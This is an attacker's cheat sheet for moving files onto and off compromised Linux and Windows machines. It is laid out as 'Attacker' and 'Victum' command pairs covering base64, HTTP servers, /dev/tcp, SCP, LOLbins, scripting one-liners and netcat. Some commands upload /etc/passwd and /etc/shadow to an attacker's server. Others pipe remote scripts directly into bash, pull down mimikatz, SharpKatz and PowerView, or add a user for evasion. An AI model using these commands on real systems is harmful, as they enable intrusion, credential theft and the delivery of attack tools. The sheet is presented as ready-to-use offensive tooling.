Resources
Cheat sheet
Download & Upload From Linux 2 Linux
- base64
# Attacker
md5sum id_rsa
cat pass.txt |base64 -w 0;echo
OR
cat pass.txt |base64 -w 0 | xclip -selection clipboard
openssl base64 -in test.js -A ; echo
# Victum
echo 'MTIzDQozMjENCjEyMzEyMw0KMTIzMTIzMTIzDQo' | base64 -d > pass.txt
# Tips & Tricks
# Large files
base64 test.js -w0 | fold -w 1000
split -b 50K nc64.exe part_ # then base64 each part.
- Web
# Attacker
python3 -m http.server 80
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
# Victum
wget https://192.168.99.21/LinEnum.sh -O /tmp/LinEnum.sh
wget -qO- https://raw.githubusercontent.com/juliourena/plaintext/master/Scripts/helloworld.py | python3 # Fileless
# Attacker
python3 -m http.server 80
python2.7 -m SimpleHTTPServer
php -S 0.0.0.0:8000
# Victum
curl -o /tmp/LinEnum.sh https://192.168.99.22/LinEnum.sh
curl https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh | bash # Fileless
# Attacker
python3 -m pip install uploadserver --break-system-packages
openssl req -x509 -newkey rsa:2048 -days 365 -nodes -keyout server.pem -out server.pem -subj "/CN=server"
python3 -m uploadserver 443 --server-certificate /root/Trash/server.pem
# Victum
curl -X POST https://192.168.99.22/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
- /dev/tcp
# Attacker
python3 -m http.server 8000
php -S 0.0.0.0:8000
# Victum
exec 3<>/dev/tcp/192.168.99.22/8000
echo -e "GET /sub.txt HTTP/1.1\r\nHost: 192.168.99.22\r\n\r\n" >&3
cat <&3
- SSH
- SCP
systemctl enable ssh
systemctl start ssh
sshpass -p 123 scp /root/Trash/pass.txt fady@192.168.99.21:/home/fady/pass.txt # Send
sshpass -p 123 scp fady@192.168.99.21:./test.txt /root/Trash/test.txt # recive
# Tips & Tricks
# New user (Evasion)
sudo useradd -m -s /bin/bash recv
sudo passwd recv
# Sending directory
tar -czf - /root/Trash | ssh fady@192.168.99.21 'cat > /home/fady/Trash.tar.gz'
- Lolbins
- Download
# Attacker
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem
openssl s_server -quiet -accept 443 -cert certificate.pem -key key.pem < /root/Tools/exe/mimikatz.exe
# Victum
openssl s_client -connect 192.168.99.22:443 -quiet > mimo.exe
Languages
# Http servers
python3 -m http.server
python2.7 -m SimpleHTTPServer
# One liners Download
python2.7 -c 'import urllib;urllib.urlretrieve ("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh")'
# One liners Upload
python3 -c 'import requests;requests.post("http://192.168.49.128:8000/upload",files={"files":open("/etc/passwd","rb")})'
# Http servers
php -S 0.0.0.0:8000
# One liners Download
php -r '$file = file_get_contents("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); file_put_contents("LinEnum.sh",$file);'
php -r 'const BUFFER = 1024; $fremote = fopen("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "rb"); $flocal = fopen("LinEnum.sh", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'
php -r '$lines = @file("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh"); foreach ($lines as $line_num => $line) { echo $line; }' | bash # FIle less
# Http servers
ruby -run -ehttpd . -p8000
# One liners Download
ruby -e 'require "net/http"; File.write("LinEnum.sh", Net::HTTP.get(URI.parse("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh")))'
# Http servers
cpan HTTP::Server::Simple::CGI
perl -MHTTP::Server::Simple::CGI -e 'my $s = new HTTP::Server::Simple::CGI(80); $s->run();'
# One liners Download
perl -e 'use LWP::Simple; getstore("https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh", "LinEnum.sh");'
# Victum
cscript.exe /nologo wget.js https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView.ps1
# Download Content File (wget.js)
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));
# Victum
cscript.exe /nologo wget.vbs https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1 PowerView2.ps1
# Download Content File (wget.vbs)
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send
with bStrm
.type = 1
.open
.write xHttp.responseBody
.savetofile WScript.Arguments.Item(1), 2
end with
Misc
- Nc or Netcat
# Victum
nc -l -p 8000 > mimikatz.exe
ncat -l -p 8000 --recv-only > SharpKatz.exe
# Reverse (Using when the Firewall block the outpund connection)
nc 192.168.99.22 443 > mimikatz.exe # Victum
ncat 192.168.49.128 443 --recv-only > SharpKatz.exe
# Attacker
nc -q 0 192.168.99.21 8000 < mimikatz.exe
ncat --send-only 192.168.49.128 8000 < SharpKatz.exe
# Reverse
nc -l -p 443 -q 0 < mimikatz.exe # Attacker
ncat -l -p 443 --send-only < SharpKatz.exe
# Tips & Tricks
# Doesn't has nc or netcat
cat < /dev/tcp/192.168.49.128/443 > SharpKatz.exe
Data Protection
openssl enc -aes256 -iter 100000 -pbkdf2 -in /etc/passwd -out passwd.enc
openssl enc -d -aes256 -iter 100000 -pbkdf2 -in passwd.enc -out passwd